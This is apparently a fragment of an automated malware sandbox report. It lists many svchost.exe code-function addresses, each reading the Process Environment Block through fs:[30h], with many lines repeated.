Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B035C mov eax, dword ptr fs:[00000030h]	2_2_035B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035FA352 mov eax, dword ptr fs:[00000030h]	2_2_035FA352
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035D8350 mov ecx, dword ptr fs:[00000030h]	2_2_035D8350
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B2349 mov eax, dword ptr fs:[00000030h]	2_2_035B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B2349 mov eax, dword ptr fs:[00000030h]	2_2_035B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B2349 mov eax, dword ptr fs:[00000030h]	2_2_035B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B2349 mov eax, dword ptr fs:[00000030h]	2_2_035B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B2349 mov eax, dword ptr fs:[00000030h]	2_2_035B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B2349 mov eax, dword ptr fs:[00000030h]	2_2_035B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B2349 mov eax, dword ptr fs:[00000030h]	2_2_035B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B2349 mov eax, dword ptr fs:[00000030h]	2_2_035B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B2349 mov eax, dword ptr fs:[00000030h]	2_2_035B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B2349 mov eax, dword ptr fs:[00000030h]	2_2_035B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B2349 mov eax, dword ptr fs:[00000030h]	2_2_035B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B2349 mov eax, dword ptr fs:[00000030h]	2_2_035B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B2349 mov eax, dword ptr fs:[00000030h]	2_2_035B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B2349 mov eax, dword ptr fs:[00000030h]	2_2_035B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B2349 mov eax, dword ptr fs:[00000030h]	2_2_035B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035D437C mov eax, dword ptr fs:[00000030h]	2_2_035D437C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0360634F mov eax, dword ptr fs:[00000030h]	2_2_0360634F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0352C310 mov ecx, dword ptr fs:[00000030h]	2_2_0352C310
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03608324 mov eax, dword ptr fs:[00000030h]	2_2_03608324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03608324 mov ecx, dword ptr fs:[00000030h]	2_2_03608324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03608324 mov eax, dword ptr fs:[00000030h]	2_2_03608324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03608324 mov eax, dword ptr fs:[00000030h]	2_2_03608324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03550310 mov ecx, dword ptr fs:[00000030h]	2_2_03550310
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0356A30B mov eax, dword ptr fs:[00000030h]	2_2_0356A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0356A30B mov eax, dword ptr fs:[00000030h]	2_2_0356A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0356A30B mov eax, dword ptr fs:[00000030h]	2_2_0356A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035DE3DB mov eax, dword ptr fs:[00000030h]	2_2_035DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035DE3DB mov eax, dword ptr fs:[00000030h]	2_2_035DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035DE3DB mov ecx, dword ptr fs:[00000030h]	2_2_035DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035DE3DB mov eax, dword ptr fs:[00000030h]	2_2_035DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035D43D4 mov eax, dword ptr fs:[00000030h]	2_2_035D43D4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035D43D4 mov eax, dword ptr fs:[00000030h]	2_2_035D43D4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035EC3CD mov eax, dword ptr fs:[00000030h]	2_2_035EC3CD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0353A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0353A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0353A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0353A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0353A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0353A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0353A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0353A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0353A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0353A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0353A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0353A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035383C0 mov eax, dword ptr fs:[00000030h]	2_2_035383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035383C0 mov eax, dword ptr fs:[00000030h]	2_2_035383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035383C0 mov eax, dword ptr fs:[00000030h]	2_2_035383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035383C0 mov eax, dword ptr fs:[00000030h]	2_2_035383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B63C0 mov eax, dword ptr fs:[00000030h]	2_2_035B63C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0354E3F0 mov eax, dword ptr fs:[00000030h]	2_2_0354E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0354E3F0 mov eax, dword ptr fs:[00000030h]	2_2_0354E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0354E3F0 mov eax, dword ptr fs:[00000030h]	2_2_0354E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035663FF mov eax, dword ptr fs:[00000030h]	2_2_035663FF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035403E9 mov eax, dword ptr fs:[00000030h]	2_2_035403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035403E9 mov eax, dword ptr fs:[00000030h]	2_2_035403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035403E9 mov eax, dword ptr fs:[00000030h]	2_2_035403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035403E9 mov eax, dword ptr fs:[00000030h]	2_2_035403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035403E9 mov eax, dword ptr fs:[00000030h]	2_2_035403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035403E9 mov eax, dword ptr fs:[00000030h]	2_2_035403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035403E9 mov eax, dword ptr fs:[00000030h]	2_2_035403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035403E9 mov eax, dword ptr fs:[00000030h]	2_2_035403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03528397 mov eax, dword ptr fs:[00000030h]	2_2_03528397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03528397 mov eax, dword ptr fs:[00000030h]	2_2_03528397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03528397 mov eax, dword ptr fs:[00000030h]	2_2_03528397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0352E388 mov eax, dword ptr fs:[00000030h]	2_2_0352E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0352E388 mov eax, dword ptr fs:[00000030h]	2_2_0352E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0352E388 mov eax, dword ptr fs:[00000030h]	2_2_0352E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0355438F mov eax, dword ptr fs:[00000030h]	2_2_0355438F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0355438F mov eax, dword ptr fs:[00000030h]	2_2_0355438F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0352A250 mov eax, dword ptr fs:[00000030h]	2_2_0352A250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03536259 mov eax, dword ptr fs:[00000030h]	2_2_03536259
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035EA250 mov eax, dword ptr fs:[00000030h]	2_2_035EA250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035EA250 mov eax, dword ptr fs:[00000030h]	2_2_035EA250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B8243 mov eax, dword ptr fs:[00000030h]	2_2_035B8243
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B8243 mov ecx, dword ptr fs:[00000030h]	2_2_035B8243
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035E0274 mov eax, dword ptr fs:[00000030h]	2_2_035E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035E0274 mov eax, dword ptr fs:[00000030h]	2_2_035E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035E0274 mov eax, dword ptr fs:[00000030h]	2_2_035E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035E0274 mov eax, dword ptr fs:[00000030h]	2_2_035E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035E0274 mov eax, dword ptr fs:[00000030h]	2_2_035E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035E0274 mov eax, dword ptr fs:[00000030h]	2_2_035E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035E0274 mov eax, dword ptr fs:[00000030h]	2_2_035E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035E0274 mov eax, dword ptr fs:[00000030h]	2_2_035E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035E0274 mov eax, dword ptr fs:[00000030h]	2_2_035E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035E0274 mov eax, dword ptr fs:[00000030h]	2_2_035E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035E0274 mov eax, dword ptr fs:[00000030h]	2_2_035E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035E0274 mov eax, dword ptr fs:[00000030h]	2_2_035E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03534260 mov eax, dword ptr fs:[00000030h]	2_2_03534260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03534260 mov eax, dword ptr fs:[00000030h]	2_2_03534260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03534260 mov eax, dword ptr fs:[00000030h]	2_2_03534260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0352826B mov eax, dword ptr fs:[00000030h]	2_2_0352826B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0360625D mov eax, dword ptr fs:[00000030h]	2_2_0360625D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0352823B mov eax, dword ptr fs:[00000030h]	2_2_0352823B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0353A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0353A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0353A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0353A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0353A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0353A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0353A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0353A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0353A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0353A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035402E1 mov eax, dword ptr fs:[00000030h]	2_2_035402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035402E1 mov eax, dword ptr fs:[00000030h]	2_2_035402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035402E1 mov eax, dword ptr fs:[00000030h]	2_2_035402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036062D6 mov eax, dword ptr fs:[00000030h]	2_2_036062D6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0356E284 mov eax, dword ptr fs:[00000030h]	2_2_0356E284
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0356E284 mov eax, dword ptr fs:[00000030h]	2_2_0356E284
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B0283 mov eax, dword ptr fs:[00000030h]	2_2_035B0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B0283 mov eax, dword ptr fs:[00000030h]	2_2_035B0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B0283 mov eax, dword ptr fs:[00000030h]	2_2_035B0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035402A0 mov eax, dword ptr fs:[00000030h]	2_2_035402A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035402A0 mov eax, dword ptr fs:[00000030h]	2_2_035402A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035C62A0 mov eax, dword ptr fs:[00000030h]	2_2_035C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035C62A0 mov ecx, dword ptr fs:[00000030h]	2_2_035C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035C62A0 mov eax, dword ptr fs:[00000030h]	2_2_035C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035C62A0 mov eax, dword ptr fs:[00000030h]	2_2_035C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035C62A0 mov eax, dword ptr fs:[00000030h]	2_2_035C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035C62A0 mov eax, dword ptr fs:[00000030h]	2_2_035C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0352C156 mov eax, dword ptr fs:[00000030h]	2_2_0352C156
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035C8158 mov eax, dword ptr fs:[00000030h]	2_2_035C8158
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03604164 mov eax, dword ptr fs:[00000030h]	2_2_03604164
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03604164 mov eax, dword ptr fs:[00000030h]	2_2_03604164
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03536154 mov eax, dword ptr fs:[00000030h]	2_2_03536154
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03536154 mov eax, dword ptr fs:[00000030h]	2_2_03536154
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035C4144 mov eax, dword ptr fs:[00000030h]	2_2_035C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035C4144 mov eax, dword ptr fs:[00000030h]	2_2_035C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035C4144 mov ecx, dword ptr fs:[00000030h]	2_2_035C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035C4144 mov eax, dword ptr fs:[00000030h]	2_2_035C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035C4144 mov eax, dword ptr fs:[00000030h]	2_2_035C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035DA118 mov ecx, dword ptr fs:[00000030h]	2_2_035DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035DA118 mov eax, dword ptr fs:[00000030h]	2_2_035DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035DA118 mov eax, dword ptr fs:[00000030h]	2_2_035DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035DA118 mov eax, dword ptr fs:[00000030h]	2_2_035DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035F0115 mov eax, dword ptr fs:[00000030h]	2_2_035F0115
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035DE10E mov eax, dword ptr fs:[00000030h]	2_2_035DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035DE10E mov ecx, dword ptr fs:[00000030h]	2_2_035DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035DE10E mov eax, dword ptr fs:[00000030h]	2_2_035DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035DE10E mov eax, dword ptr fs:[00000030h]	2_2_035DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035DE10E mov ecx, dword ptr fs:[00000030h]	2_2_035DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035DE10E mov eax, dword ptr fs:[00000030h]	2_2_035DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035DE10E mov eax, dword ptr fs:[00000030h]	2_2_035DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035DE10E mov ecx, dword ptr fs:[00000030h]	2_2_035DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035DE10E mov eax, dword ptr fs:[00000030h]	2_2_035DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035DE10E mov ecx, dword ptr fs:[00000030h]	2_2_035DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03560124 mov eax, dword ptr fs:[00000030h]	2_2_03560124
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036061E5 mov eax, dword ptr fs:[00000030h]	2_2_036061E5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035AE1D0 mov eax, dword ptr fs:[00000030h]	2_2_035AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035AE1D0 mov eax, dword ptr fs:[00000030h]	2_2_035AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035AE1D0 mov ecx, dword ptr fs:[00000030h]	2_2_035AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035AE1D0 mov eax, dword ptr fs:[00000030h]	2_2_035AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035AE1D0 mov eax, dword ptr fs:[00000030h]	2_2_035AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035F61C3 mov eax, dword ptr fs:[00000030h]	2_2_035F61C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035F61C3 mov eax, dword ptr fs:[00000030h]	2_2_035F61C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035601F8 mov eax, dword ptr fs:[00000030h]	2_2_035601F8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B019F mov eax, dword ptr fs:[00000030h]	2_2_035B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B019F mov eax, dword ptr fs:[00000030h]	2_2_035B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B019F mov eax, dword ptr fs:[00000030h]	2_2_035B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B019F mov eax, dword ptr fs:[00000030h]	2_2_035B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0352A197 mov eax, dword ptr fs:[00000030h]	2_2_0352A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0352A197 mov eax, dword ptr fs:[00000030h]	2_2_0352A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0352A197 mov eax, dword ptr fs:[00000030h]	2_2_0352A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03570185 mov eax, dword ptr fs:[00000030h]	2_2_03570185
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035EC188 mov eax, dword ptr fs:[00000030h]	2_2_035EC188
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035EC188 mov eax, dword ptr fs:[00000030h]	2_2_035EC188
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035D4180 mov eax, dword ptr fs:[00000030h]	2_2_035D4180
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035D4180 mov eax, dword ptr fs:[00000030h]	2_2_035D4180
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03532050 mov eax, dword ptr fs:[00000030h]	2_2_03532050
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B6050 mov eax, dword ptr fs:[00000030h]	2_2_035B6050
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0355C073 mov eax, dword ptr fs:[00000030h]	2_2_0355C073
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0354E016 mov eax, dword ptr fs:[00000030h]	2_2_0354E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0354E016 mov eax, dword ptr fs:[00000030h]	2_2_0354E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0354E016 mov eax, dword ptr fs:[00000030h]	2_2_0354E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0354E016 mov eax, dword ptr fs:[00000030h]	2_2_0354E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B4000 mov ecx, dword ptr fs:[00000030h]	2_2_035B4000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035D2000 mov eax, dword ptr fs:[00000030h]	2_2_035D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035D2000 mov eax, dword ptr fs:[00000030h]	2_2_035D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035D2000 mov eax, dword ptr fs:[00000030h]	2_2_035D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035D2000 mov eax, dword ptr fs:[00000030h]	2_2_035D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035D2000 mov eax, dword ptr fs:[00000030h]	2_2_035D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035D2000 mov eax, dword ptr fs:[00000030h]	2_2_035D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035D2000 mov eax, dword ptr fs:[00000030h]	2_2_035D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035D2000 mov eax, dword ptr fs:[00000030h]	2_2_035D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035C6030 mov eax, dword ptr fs:[00000030h]	2_2_035C6030
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0352A020 mov eax, dword ptr fs:[00000030h]	2_2_0352A020
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0352C020 mov eax, dword ptr fs:[00000030h]	2_2_0352C020
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B20DE mov eax, dword ptr fs:[00000030h]	2_2_035B20DE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0352C0F0 mov eax, dword ptr fs:[00000030h]	2_2_0352C0F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035720F0 mov ecx, dword ptr fs:[00000030h]	2_2_035720F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0352A0E3 mov ecx, dword ptr fs:[00000030h]	2_2_0352A0E3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035380E9 mov eax, dword ptr fs:[00000030h]	2_2_035380E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B60E0 mov eax, dword ptr fs:[00000030h]	2_2_035B60E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0353208A mov eax, dword ptr fs:[00000030h]	2_2_0353208A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035F60B8 mov eax, dword ptr fs:[00000030h]	2_2_035F60B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035F60B8 mov ecx, dword ptr fs:[00000030h]	2_2_035F60B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035280A0 mov eax, dword ptr fs:[00000030h]	2_2_035280A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035C80A8 mov eax, dword ptr fs:[00000030h]	2_2_035C80A8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03530750 mov eax, dword ptr fs:[00000030h]	2_2_03530750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035BE75D mov eax, dword ptr fs:[00000030h]	2_2_035BE75D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03572750 mov eax, dword ptr fs:[00000030h]	2_2_03572750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03572750 mov eax, dword ptr fs:[00000030h]	2_2_03572750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B4755 mov eax, dword ptr fs:[00000030h]	2_2_035B4755
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0356674D mov esi, dword ptr fs:[00000030h]	2_2_0356674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0356674D mov eax, dword ptr fs:[00000030h]	2_2_0356674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0356674D mov eax, dword ptr fs:[00000030h]	2_2_0356674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03538770 mov eax, dword ptr fs:[00000030h]	2_2_03538770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03540770 mov eax, dword ptr fs:[00000030h]	2_2_03540770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03540770 mov eax, dword ptr fs:[00000030h]	2_2_03540770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03540770 mov eax, dword ptr fs:[00000030h]	2_2_03540770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03540770 mov eax, dword ptr fs:[00000030h]	2_2_03540770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03540770 mov eax, dword ptr fs:[00000030h]	2_2_03540770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03540770 mov eax, dword ptr fs:[00000030h]	2_2_03540770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03540770 mov eax, dword ptr fs:[00000030h]	2_2_03540770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03540770 mov eax, dword ptr fs:[00000030h]	2_2_03540770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03540770 mov eax, dword ptr fs:[00000030h]	2_2_03540770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03540770 mov eax, dword ptr fs:[00000030h]	2_2_03540770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03540770 mov eax, dword ptr fs:[00000030h]	2_2_03540770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03540770 mov eax, dword ptr fs:[00000030h]	2_2_03540770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03530710 mov eax, dword ptr fs:[00000030h]	2_2_03530710
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03560710 mov eax, dword ptr fs:[00000030h]	2_2_03560710
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0356C700 mov eax, dword ptr fs:[00000030h]	2_2_0356C700
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0356273C mov eax, dword ptr fs:[00000030h]	2_2_0356273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0356273C mov ecx, dword ptr fs:[00000030h]	2_2_0356273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0356273C mov eax, dword ptr fs:[00000030h]	2_2_0356273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035AC730 mov eax, dword ptr fs:[00000030h]	2_2_035AC730
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0356C720 mov eax, dword ptr fs:[00000030h]	2_2_0356C720
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0356C720 mov eax, dword ptr fs:[00000030h]	2_2_0356C720
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0353C7C0 mov eax, dword ptr fs:[00000030h]	2_2_0353C7C0
